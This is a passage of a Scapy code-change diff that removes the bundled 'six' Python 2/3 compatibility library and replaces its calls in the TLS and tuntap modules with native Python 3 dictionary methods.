b/scapy/layers/tls/keyexchange_tls13.py index 87f979fd4d3..1df598de82f 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -33,7 +33,6 @@ _tls_named_groups_import, _tls_named_groups_pubbytes, ) -import scapy.libs.six as six if conf.crypto_valid: from cryptography.hazmat.primitives.asymmetric import ec @@ -168,9 +167,9 @@ def post_build(self, pkt, pay): if group_name in self.tls_session.tls13_client_pubshares: privkey = self.server_share.privkey pubkey = self.tls_session.tls13_client_pubshares[group_name] - if group_name in six.itervalues(_tls_named_ffdh_groups): + if group_name in _tls_named_ffdh_groups.values(): pms = privkey.exchange(pubkey) - elif group_name in six.itervalues(_tls_named_curves): + elif group_name in _tls_named_curves.values(): if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: @@ -191,9 +190,9 @@ def post_dissection(self, r): if group_name in self.tls_session.tls13_client_privshares: pubkey = self.server_share.pubkey privkey = self.tls_session.tls13_client_privshares[group_name] - if group_name in six.itervalues(_tls_named_ffdh_groups): + if group_name in _tls_named_ffdh_groups.values(): pms = privkey.exchange(pubkey) - elif group_name in six.itervalues(_tls_named_curves): + elif group_name in _tls_named_curves.values(): if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: @@ -202,9 +201,9 @@ def post_dissection(self, r): elif group_name in self.tls_session.tls13_server_privshare: pubkey = self.tls_session.tls13_client_pubshares[group_name] privkey = self.tls_session.tls13_server_privshare[group_name] - if group_name in six.itervalues(_tls_named_ffdh_groups): + if group_name in _tls_named_ffdh_groups.values(): pms = privkey.exchange(pubkey) - elif group_name in six.itervalues(_tls_named_curves): + elif group_name in _tls_named_curves.values(): if group_name in ["x25519", "x448"]: pms = privkey.exchange(pubkey) else: diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 463504d28d5..c8e55a34757 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -37,7 +37,6 @@ from scapy.layers.tls.crypto.cipher_stream import Cipher_NULL from scapy.layers.tls.crypto.common import CipherError from scapy.layers.tls.crypto.h_mac import HMACError -import scapy.libs.six as six if conf.crypto_valid_advanced: from scapy.layers.tls.crypto.cipher_aead import Cipher_CHACHA20_POLY1305 @@ -156,7 +155,7 @@ def getfield(self, pkt, s): else: return ret, [Raw(load=b"")] - if False in six.itervalues(pkt.tls_session.rcs.cipher.ready): + if False in pkt.tls_session.rcs.cipher.ready.values(): return ret, _TLSEncryptedContent(remain) else: while remain: diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 887a024a078..93d0131ced2 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -15,7 +15,6 @@ from scapy.config import conf from scapy.compat import raw -import scapy.libs.six as six from scapy.error import log_runtime, warning from scapy.packet import Packet from scapy.pton_ntop import inet_pton @@ -861,7 +860,7 @@ def compute_tls13_next_traffic_secrets(self, connection_end, read_or_write): # def consider_read_padding(self): # Return True if padding is needed. Used by TLSPadField. return (self.rcs.cipher.type == "block" and - not (False in six.itervalues(self.rcs.cipher.ready))) + not (False in self.rcs.cipher.ready.values())) def consider_write_padding(self): # Return True if padding is needed. Used by TLSPadField. @@ -1150,7 +1149,7 @@ def find(self, session): def __repr__(self): res = [("First endpoint", "Second endpoint", "Session ID")] - for li in six.itervalues(self.sessions): + for li in self.sessions.values(): for s in li: src = "%s[%d]" % (s.ipsrc, s.sport) dst = "%s[%d]" % (s.ipdst, s.dport) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index 1f70e36af78..c7ecf1f364a 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -11,7 +11,6 @@ """ -import os import socket import time from fcntl import ioctl @@ -29,7 +28,6 @@ from scapy.packet import Packet from scapy.supersocket import SimpleSocket -import scapy.libs.six as six # Linux-specific defines (/usr/include/linux/if_tun.h) LINUX_TUNSETIFF = 0x400454ca @@ -209,12 +207,7 @@ def recv_raw(self, x=None): x += self.mtu_overhead - if six.PY2: - # For some mystical reason, using self.ins.read ignores - # buffering=0 on python 2.7 and blocks ?! - dat = os.read(self.ins.fileno(), x) - else: - dat = self.ins.read(x) + dat = self.ins.read(x) r = self.kernel_packet_class, dat, time.time() if self.mtu_overhead > 0 and self.strip_packet_info: # Get the packed class of the payload, without triggering a full diff --git a/scapy/libs/six.py b/scapy/libs/six.py deleted file mode 100644 index 8ba67f2798d..00000000000 --- a/scapy/libs/six.py +++ /dev/null @@ -1,999 +0,0 @@ -# Copyright (c) 2010-2020 Benjamin Peterson -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. - -# This file is published as part of Scapy - -"""Utilities for writing code that runs on Python 2 and 3""" - - -import functools -import itertools -import operator -import sys -import types - -__author__ = "Benjamin Peterson " -__version__ = "1.16.0" - - -# Useful for very coarse version differentiation. -PY2 = sys.version_info[0] == 2 -PY3 = sys.version_info[0] == 3 -PY34 = sys.version_info[0:2] >= (3, 4) - -if PY3: - string_types = str, - integer_types = int, - class_types = type, - text_type = str - binary_type = bytes - - MAXSIZE = sys.maxsize -else: - string_types = basestring, - integer_types = (int, long) - class_types = (type, types.ClassType) - text_type = unicode - binary_type = str - - if sys.platform.startswith("java"): - # Jython always uses 32 bits. - MAXSIZE = int((1 << 31) - 1) - else: - # It's possible to have sizeof(long) != sizeof(Py_ssize_t). - class X(object): - - def __len__(self): - return 1 << 31 - try: - len(X()) - except OverflowError: - # 32-bit - MAXSIZE = int((1 << 31) - 1) - else: - # 64-bit - MAXSIZE = int((1 << 63) - 1) - del X - -if PY34: - from importlib.util import spec_from_loader -else: - spec_from_loader = None - - -def _add_doc(func, doc): - """Add documentation to a function.""" - func.__doc__ = doc - - -def _import_module(name): - """Import module, returning the module after the last dot.""" - __import__(name) - return sys.modules[name] - - -class _LazyDescr(object): - - def __init__(self, name): - self.name = name - - def __get__(self, obj, tp): - result = self._resolve() - setattr(obj, self.name, result) # Invokes __set__. - try: - # This is a bit ugly, but it avoids running this again by - # removing this descriptor. - delattr(obj.__class__, self.name) - except AttributeError: - pass - return result - - -class MovedModule(_LazyDescr): - - def __init__(self, name, old, new=None): - super(MovedModule, self).__init__(name) - if PY3: - if new is None: - new = name - self.mod = new - else: - self.mod = old - - def _resolve(self): - return _import_module(self.mod) - - def __getattr__(self, attr): - _module = self._resolve() - value = getattr(_module, attr) - setattr(self, attr, value) - return value - - -class _LazyModule(types.ModuleType): - - def __init__(self, name): - super(_LazyModule, self).__init__(name) - self.__doc__ = self.__class__.__doc__ - - def __dir__(self): - attrs = ["__doc__", "__name__"] - attrs += [attr.name for attr in self._moved_attributes] - return attrs - - # Subclasses should override this - _moved_attributes = [] - - -class MovedAttribute(_LazyDescr): - - def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): - super(MovedAttribute, self).__init__(name) - if PY3: - if new_mod is None: - new_mod = name - self.mod = new_mod - if new_attr is None: - if old_attr is None: - new_attr = name - else: - new_attr = old_attr - self.attr = new_attr - else: - self.mod = old_mod - if old_attr is None: - old_attr = name - self.attr = old_attr - - def _resolve(self): - module = _import_module(self.mod) - return getattr(module, self.attr) - - -class _SixMetaPathImporter(object): - - """ - A meta path importer to import six.moves and its submodules. - - This class implements a PEP302 finder and loader. It should be compatible - with Python 2.5 and all existing versions of Python3 - """ - - def __init__(self, six_module_name): - self.name = six_module_name - self.known_modules = {} - - def _add_module(self, mod, *fullnames): - for fullname in fullnames: - self.known_modules[self.name + "." + fullname] = mod - - def _get_module(self, fullname): - return self.known_modules[self.name + "." + fullname] - - def find_module(self, fullname, path=None): - if fullname in self.known_modules: - return self - return None - - def find_spec(self, fullname, path, target=None): - if fullname in self.known_modules: - return spec_from_loader(fullname, self) - return None - - def __get_module(self, fullname): - try: - return self.known_modules[fullname] - except KeyError: - raise ImportError("This loader does not know module " + fullname) - - def load_module(self, fullname): - try: - # in case of a reload - return sys.modules[fullname] - except KeyError: - pass - mod = self.__get_module(fullname) - if isinstance(mod, MovedModule): - mod = mod._resolve() - else: - mod.__loader__ = self - sys.modules[fullname] = mod - return mod - - def is_package(self, fullname): - """ - Return true, if the named module is a package. - - We need this method to get correct spec objects with - Python 3.4 (see PEP451) - """ - return hasattr(self.__get_module(fullname), "__path__") - - def get_code(self, fullname): - """Return None - - Required, if is_package is implemented""" - self.__get_module(fullname) # eventually raises ImportError - return None - get_source = get_code # same as get_code - - def create_module(self, spec): - return self.load_module(spec.name) - - def exec_module(self, module): - pass - -_importer = _SixMetaPathImporter(__name__) - - -class _MovedItems(_LazyModule): - - """Lazy loading of moved objects""" - __path__ = [] # mark as package - - -_moved_attributes = [ - MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), - MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), - MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), - MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), - MovedAttribute("intern", "__builtin__", "sys"), - MovedAttribute("map", "itertools", "builtins", "imap", "map"), - MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), - MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), - MovedAttribute("getoutput", "commands", "subprocess"), - MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), - MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), - MovedAttribute("reduce", "__builtin__", "functools"), - MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), - MovedAttribute("StringIO", "StringIO", "io"), - MovedAttribute("UserDict", "UserDict", "collections", "IterableUserDict", "UserDict"), - MovedAttribute("UserList", "UserList", "collections"), - MovedAttribute("UserString", "UserString", "collections"), - MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), - MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), - MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), - MovedModule("builtins", "__builtin__"), - MovedModule("configparser", "ConfigParser"), - MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), - MovedModule("copyreg", "copy_reg"), - MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), - MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), - MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), - MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), - MovedModule("http_cookies", "Cookie", "http.cookies"), - MovedModule("html_entities", "htmlentitydefs", "html.entities"), - MovedModule("html_parser", "HTMLParser", "html.parser"), - MovedModule("http_client", "httplib", "http.client"), - MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), - MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), - MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), - MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), - MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), - MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), - MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), - MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), - MovedModule("cPickle", "cPickle", "pickle"), - MovedModule("queue", "Queue"), - MovedModule("reprlib", "repr"), - MovedModule("socketserver", "SocketServer"), - MovedModule("_thread", "thread", "_thread"), - MovedModule("tkinter", "Tkinter"), - MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), - MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), - MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), - MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), - MovedModule("tkinter_tix", "Tix", "tkinter.tix"), - MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), - MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), - MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), - MovedModule("tkinter_colorchooser", "tkColorChooser", - "tkinter.colorchooser"), - MovedModule("tkinter_commondialog", "tkCommonDialog", - "tkinter.commondialog"), - MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), - MovedModule("tkinter_font", "tkFont", "tkinter.font"), - MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), - MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", - "tkinter.simpledialog"), - MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), - MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), - MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), - MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), - MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), - MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), -] -# Add windows specific modules. -if sys.platform == "win32": - _moved_attributes += [ - MovedModule("winreg", "_winreg"), - ] - -for attr in _moved_attributes: - setattr(_MovedItems, attr.name, attr) - if isinstance(attr, MovedModule): - _importer._add_module(attr, "moves." + attr.name) -del attr - -_MovedItems._moved_attributes = _moved_attributes - -moves = _MovedItems(__name__ + ".moves") -_importer._add_module(moves, "moves") - - -class Module_six_moves_urllib_parse(_LazyModule): - - """Lazy loading of moved objects in six.moves.urllib_parse""" - - -_urllib_parse_moved_attributes = [ - MovedAttribute("ParseResult", "urlparse", "urllib.parse"), - MovedAttribute("SplitResult", "urlparse", "urllib.parse"), - MovedAttribute("parse_qs", "urlparse", "urllib.parse"), - MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), - MovedAttribute("urldefrag", "urlparse", "urllib.parse"), - MovedAttribute("urljoin", "urlparse", "urllib.parse"), - MovedAttribute("urlparse", "urlparse", "urllib.parse"), - MovedAttribute("urlsplit", "urlparse", "urllib.parse"), - MovedAttribute("urlunparse", "urlparse", "urllib.parse"), - MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), - MovedAttribute("quote", "urllib", "urllib.parse"), - MovedAttribute("quote_plus", "urllib", "urllib.parse"), - MovedAttribute("unquote", "urllib", "urllib.parse"), - MovedAttribute("unquote_plus", "urllib", "urllib.parse"), - MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), - MovedAttribute("urlencode", "urllib", "urllib.parse"), - MovedAttribute("splitquery", "urllib", "urllib.parse"), - MovedAttribute("splittag", "urllib", "urllib.parse"), - MovedAttribute("splituser", "urllib", "urllib.parse"), - MovedAttribute("splitvalue", "urllib", "urllib.parse"), - MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), - MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), - MovedAttribute("uses_params", "urlparse", "urllib.parse"), - MovedAttribute("uses_query", "urlparse", "urllib.parse"), - MovedAttribute("uses_relative", "urlparse", "urllib.parse"), -] -for attr in _urllib_parse_moved_attributes: - setattr(Module_six_moves_urllib_parse, attr.name, attr) -del attr - -Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes - -_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), - "moves.urllib_parse", "moves.urllib.parse") - - -class Module_six_moves_urllib_error(_LazyModule): - - """Lazy loading of moved objects in six.moves.urllib_error""" - - -_urllib_error_moved_attributes = [ - MovedAttribute("URLError", "urllib2", "urllib.error"), - MovedAttribute("HTTPError", "urllib2", "urllib.error"), - MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), -] -for attr in _urllib_error_moved_attributes: - setattr(Module_six_moves_urllib_error, attr.name, attr) -del attr - -Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes - -_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), - "moves.urllib_error", "moves.urllib.error") - - -class Module_six_moves_urllib_request(_LazyModule): - - """Lazy loading of moved objects in six.moves.urllib_request""" - - -_urllib_request_moved_attributes = [ - MovedAttribute("urlopen", "urllib2", "urllib.request"), - MovedAttribute("install_opener", "urllib2", "urllib.request"), - MovedAttribute("build_opener", "urllib2", "urllib.request"), - MovedAttribute("pathname2url", "urllib", "urllib.request"), - MovedAttribute("url2pathname", "urllib", "urllib.request"), - MovedAttribute("getproxies", "urllib", "urllib.request"), - MovedAttribute("Request", "urllib2", "urllib.request"), - MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), - MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), - MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), - MovedAttribute("BaseHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), - MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), - MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), - MovedAttribute("FileHandler", "urllib2", "urllib.request"), - MovedAttribute("FTPHandler", "urllib2", "urllib.request"), - MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), - MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), - MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), - MovedAttribute("urlretrieve", "urllib", "urllib.request"), - MovedAttribute("urlcleanup", "urllib", "urllib.request"), - MovedAttribute("URLopener", "urllib", "urllib.request"), - MovedAttribute("FancyURLopener", "urllib", "urllib.request"), - MovedAttribute("proxy_bypass", "urllib", "urllib.request"), - MovedAttribute("parse_http_list", "urllib2", "urllib.request"), - MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), -] -for attr in _urllib_request_moved_attributes: - setattr(Module_six_moves_urllib_request, attr.name, attr) -del attr - -Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes - -_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), - "moves.urllib_request", "moves.urllib.request") - - -class Module_six_moves_urllib_response(_LazyModule): - - """Lazy loading of moved objects in six.moves.urllib_response""" - - -_urllib_response_moved_attributes = [ - MovedAttribute("addbase", "urllib", "urllib.response"), - MovedAttribute("addclosehook", "urllib", "urllib.response"), - MovedAttribute("addinfo", "urllib", "urllib.response"), - MovedAttribute("addinfourl", "urllib", "urllib.response"), -] -for attr in _urllib_response_moved_attributes: - setattr(Module_six_moves_urllib_response, attr.name, attr) -del attr - -Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes - -_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), - "moves.urllib_response", "moves.urllib.response") - - -class Module_six_moves_urllib_robotparser(_LazyModule): - - """Lazy loading of moved objects in six.moves.urllib_robotparser""" - - -_urllib_robotparser_moved_attributes = [ - MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), -] -for attr in _urllib_robotparser_moved_attributes: - setattr(Module_six_moves_urllib_robotparser, attr.name, attr) -del attr - -Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes - -_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), - "moves.urllib_robotparser", "moves.urllib.robotparser") - - -class Module_six_moves_urllib(types.ModuleType): - - """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" - __path__ = [] # mark as package - parse = _importer._get_module("moves.urllib_parse") - error = _importer._get_module("moves.urllib_error") - request = _importer._get_module("moves.urllib_request") - response = _importer._get_module("moves.urllib_response") - robotparser = _importer._get_module("moves.urllib_robotparser") - - def __dir__(self): - return ['parse', 'error', 'request', 'response', 'robotparser'] - -_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), - "moves.urllib") - - -def add_move(move): - """Add an item to six.moves.""" - setattr(_MovedItems, move.name, move) - - -def remove_move(name): - """Remove item from six.moves.""" - try: - delattr(_MovedItems, name) - except AttributeError: - try: - del moves.__dict__[name] - except KeyError: - raise AttributeError("no such move, %r" % (name,)) - - -if PY3: - _meth_func = "__func__" - _meth_self = "__self__" - - _func_closure = "__closure__" - _func_code = "__code__" - _func_defaults = "__defaults__" - _func_globals = "__globals__" -else: - _meth_func = "im_func" - _meth_self = "im_self" - - _func_closure = "func_closure" - _func_code = "func_code" - _func_defaults = "func_defaults" - _func_globals = "func_globals" - - -try: - advance_iterator = next -except NameError: - def advance_iterator(it): - return it.next() -next = advance_iterator - - -try: - callable = callable -except NameError: - def callable(obj): - return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) - - -if PY3: - def get_unbound_function(unbound): - return unbound - - create_bound_method = types.MethodType - - def create_unbound_method(func, cls): - return func - - Iterator = object -else: - def get_unbound_function(unbound): - return unbound.im_func - - def create_bound_method(func, obj): - return types.MethodType(func, obj, obj.__class__) - - def create_unbound_method(func, cls): - return types.MethodType(func, None, cls) - - class Iterator(object): - - def next(self): - return type(self).__next__(self) - - callable = callable -_add_doc(get_unbound_function, - """Get the function out of a possibly unbound function""") - - -get_method_function = operator.attrgetter(_meth_func) -get_method_self = operator.attrgetter(_meth_self) -get_function_closure = operator.attrgetter(_func_closure) -get_function_code = operator.attrgetter(_func_code) -get_function_defaults = operator.attrgetter(_func_defaults) -get_function_globals = operator.attrgetter(_func_globals) - - -if PY3: - def iterkeys(d, **kw): - return iter(d.keys(**kw)) - - def itervalues(d, **kw): - return iter(d.values(**kw)) - - def iteritems(d, **kw): - return iter(d.items(**kw)) - - def iterlists(d, **kw): - return iter(d.lists(**kw)) - - viewkeys = operator.methodcaller("keys") - - viewvalues = operator.methodcaller("values") - - viewitems = operator.methodcaller("items") -else: - def iterkeys(d, **kw): - return d.iterkeys(**kw) - - def itervalues(d, **kw): - return d.itervalues(**kw) - - def iteritems(d, **kw): - return d.iteritems(**kw) - - def iterlists(d, **kw): - return d.iterlists(**kw) - - viewkeys = operator.methodcaller("viewkeys") - - viewvalues = operator.methodcaller("viewvalues") - - viewitems = operator.methodcaller("viewitems") - -_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") -_add_doc(itervalues, "Return an iterator over the values of a dictionary.") -_add_doc(iteritems, - "Return an iterator over the (key, value) pairs of a dictionary.") -_add_doc(iterlists, - "Return an iterator over the (key, [values]) pairs of a dictionary.") - - -if PY3: - def b(s): - return s.encode("latin-1") - - def u(s): - return s - unichr = chr - import struct - int2byte = struct.Struct(">B").pack - del struct - byte2int = operator.itemgetter(0) - indexbytes = operator.getitem - iterbytes = iter - import io - StringIO = io.StringIO - BytesIO = io.BytesIO - del io - _assertCountEqual = "assertCountEqual" - if sys.version_info[1] <= 1: - _assertRaisesRegex = "assertRaisesRegexp" - _assertRegex = "assertRegexpMatches" - _assertNotRegex = "assertNotRegexpMatches" - else: - _assertRaisesRegex = "assertRaisesRegex" - _assertRegex = "assertRegex" - _assertNotRegex = "assertNotRegex" -else: - def b(s): - return s - # Workaround for standalone backslash - - def u(s): - return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") - unichr = unichr - int2byte = chr - - def byte2int(bs): - return ord(bs[0]) - - def indexbytes(buf, i): - return ord(buf[i]) - iterbytes = functools.partial(itertools.imap, ord) - import StringIO - StringIO = BytesIO = StringIO.StringIO - _assertCountEqual = "assertItemsEqual" - _assertRaisesRegex = "assertRaisesRegexp" - _assertRegex = "assertRegexpMatches" - _assertNotRegex = "assertNotRegexpMatches" -_add_doc(b, """Byte literal""") -_add_doc(u, """Text literal""") - - -def assertCountEqual(self, *args, **kwargs): - return getattr(self, _assertCountEqual)(*args, **kwargs) - - -def assertRaisesRegex(self, *args, **kwargs): - return getattr(self, _assertRaisesRegex)(*args, **kwargs) - - -def assertRegex(self, *args, **kwargs): - return getattr(self, _assertRegex)(*args, **kwargs) - - -def assertNotRegex(self, *args, **kwargs): - return getattr(self, _assertNotRegex)(*args, **kwargs) - - -if PY3: - exec_ = getattr(moves.builtins, "exec") - - def reraise(tp, value, tb=None): - try: - if value is None: - value = tp() - if value.__traceback__ is not tb: - raise value.with_traceback(tb) - raise value - finally: - value = None - tb = None - -else: - def exec_(_code_, _globs_=None, _locs_=None): - """Execute code in a namespace.""" - if _globs_ is None: - frame = sys._getframe(1) - _globs_ = frame.f_globals - if _locs_ is None: - _locs_ = frame.f_locals - del frame - elif _locs_ is None: - _locs_ = _globs_ - exec("""exec _code_ in _globs_, _locs_""") - - exec_("""def reraise(tp, value, tb=None): - try: - raise tp, value, tb - finally: - tb = None -""") - - -if sys.version_info[:2] > (3,): - exec_("""def raise_from(value, from_value): - try: - raise value from from_value - finally: - value = None -""") -else: - def raise_from(value, from_value): - raise value - - -print_ = getattr(moves.builtins, "print", None) -if print_ is None: - def print_(*args, **kwargs): - """The new-style print function for Python 2.4 and 2.5.""" - fp = kwargs.pop("file", sys.stdout) - if fp is None: - return - - def write(data): - if not isinstance(data, basestring): - data = str(data) - # If the file has an encoding, encode unicode with it. - if (isinstance(fp, file) and - isinstance(data, unicode) and - fp.encoding is not None): - errors = getattr(fp, "errors", None) - if errors is None: - errors = "strict" - data = data.encode(fp.encoding, errors) - fp.write(data) - want_unicode = False - sep = kwargs.pop("sep", None) - if sep is not None: - if isinstance(sep, unicode): - want_unicode = True - elif not isinstance(sep, str): - raise TypeError("sep must be None or a string") - end = kwargs.pop("end", None) - if end is not None: - if isinstance(end, unicode): - want_unicode = True - elif not isinstance(end, str): - raise TypeError("end must be None or a string") - if kwargs: - raise TypeError("invalid keyword arguments to print()") - if not want_unicode: - for arg in args: - if isinstance(arg, unicode): - want_unicode = True - break - if want_unicode: - newline = unicode("\n") - space = unicode(" ") - else: - newline = "\n" - space = " " - if sep is None: - sep = space - if end is None: - end = newline - for i, arg in enumerate(args): - if i: - write(sep) - write(arg) - write(end) -if sys.version_info[:2] < (3, 3): - _print = print_ - - def print_(*args, **kwargs): - fp = kwargs.get("file", sys.stdout) - flush = kwargs.pop("flush", False) - _print(*args, **kwargs) - if flush and fp is not None: - fp.flush() - -_add_doc(reraise, """Reraise an exception.""") - -if sys.version_info[0:2] < (3, 4): - # This does exactly the same what the :func:`py3:functools.update_wrapper` - # function does on Python versions after 3.2. It sets the ``__wrapped__`` - # attribute on ``wrapper`` object and it doesn't raise an error if any of - # the attributes mentioned in ``assigned`` and ``updated`` are missing on - # ``wrapped`` object. - def _update_wrapper(wrapper, wrapped, - assigned=functools.WRAPPER_ASSIGNMENTS, - updated=functools.WRAPPER_UPDATES): - for attr in assigned: - try: - value = getattr(wrapped, attr) - except AttributeError: - continue - else: - setattr(wrapper, attr, value) - for attr in updated: - getattr(wrapper, attr).update(getattr(wrapped, attr, {})) - wrapper.__wrapped__ = wrapped - return wrapper - _update_wrapper.__doc__ = functools.update_wrapper.__doc__ - - def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, - updated=functools.WRAPPER_UPDATES): - return functools.partial(_update_wrapper, wrapped=wrapped, - assigned=assigned, updated=updated) - wraps.__doc__ = functools.wraps.__doc__ - -else: - wraps = functools.wraps - - -def with_metaclass(meta, *bases): - """Create a base class with a metaclass.""" - # This requires a bit of explanation: the basic idea is to make a dummy - # metaclass for one level of class instantiation that replaces itself with - # the actual metaclass. - class metaclass(type): - - def __new__(cls, name, this_bases, d): - if sys.version_info[:2] >= (3, 7): - # This version introduced PEP 560 that requires a bit - # of extra care (we mimic what is done by __build_class__). - resolved_bases = types.resolve_bases(bases) - if resolved_bases is not bases: - d['__orig_bases__'] = bases - else: - resolved_bases = bases - return meta(name, resolved_bases, d) - - @classmethod - def __prepare__(cls, name, this_bases): - return meta.__prepare__(name, bases) - return type.__new__(metaclass, 'temporary_class', (), {}) - - -def add_metaclass(metaclass): - """Class decorator for creating a class with a metaclass.""" - def wrapper(cls): - orig_vars = cls.__dict__.copy() - slots = orig_vars.get('__slots__') - if slots is not None: - if isinstance(slots, str): - slots = [slots] - for slots_var in slots: - orig_vars.pop(slots_var) - orig_vars.pop('__dict__', None) - orig_vars.pop('__weakref__', None) - if hasattr(cls, '__qualname__'): - orig_vars['__qualname__'] = cls.__qualname__ - return metaclass(cls.__name__, cls.__bases__, orig_vars) - return wrapper - - -def ensure_binary(s, encoding='utf-8', errors='strict'): - """Coerce **s** to six.binary_type. - - For Python 2: - - `unicode` -> encoded to `str` - - `str` -> `str` - - For Python 